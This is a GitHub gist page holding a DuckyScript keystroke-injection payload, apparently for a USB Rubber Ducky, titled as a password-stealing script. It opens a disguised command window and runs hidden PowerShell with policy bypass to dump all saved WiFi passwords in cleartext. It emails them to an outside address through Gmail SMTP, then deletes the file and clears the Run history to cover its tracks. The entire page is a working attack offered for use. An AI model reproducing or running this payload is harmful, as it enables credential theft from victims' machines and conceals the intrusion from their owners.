Created
April 17, 2018 04:52
-
-
Save JonnyBanana/23f9c1317c4e76801cf70ed2bb6b18f4 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
REM Password Stealing script by TylerTechNZ | |
REM | |
REM --> Create Obfuscated CMD | |
DELAY 2000 | |
WINDOWS r | |
DELAY 200 | |
STRING cmd | |
ENTER | |
DELAY 200 | |
STRING MODE 20,1 | |
ENTER | |
DELAY 200 | |
STRING COLOR FE | |
ENTER | |
REM --> Start Powershell, get all WiFi passwords and Export to CSV | |
DELAY 200 | |
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Export-Csv temp.csv" | |
ENTER | |
REM --> Wait a couple of seconds and start a new Obfuscated CMD | |
DELAY 3000 | |
WINDOWS r | |
DELAY 200 | |
STRING cmd | |
ENTER | |
DELAY 200 | |
STRING MODE 20,1 | |
ENTER | |
DELAY 200 | |
STRING COLOR FE | |
ENTER | |
DELAY 200 | |
REM --> Email CSV via GMAIL | |
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$SMTPInfo = New-Object Net.Mail.SmtpClient('smtp.gmail.com', 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('SENDEREMAIL', 'SENDERPASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'SENDEREMAIL'; $ReportEmail.To.Add('RECIEVEREMAIL'); $ReportEmail.Subject = 'Wifi Report'; $ReportEmail.Body = 'Attached is your wifi report.'; $ReportEmail.Attachments.Add('temp.csv'); $SMTPInfo.Send($ReportEmail)" | |
ENTER | |
REM --> Then cover your tracks. You were never here. | |
DELAY 500 | |
STRING del temp.csv | |
ENTER | |
DELAY 500 | |
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" | |
ENTER | |
DELAY 500 | |
STRING exit | |
ENTER |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment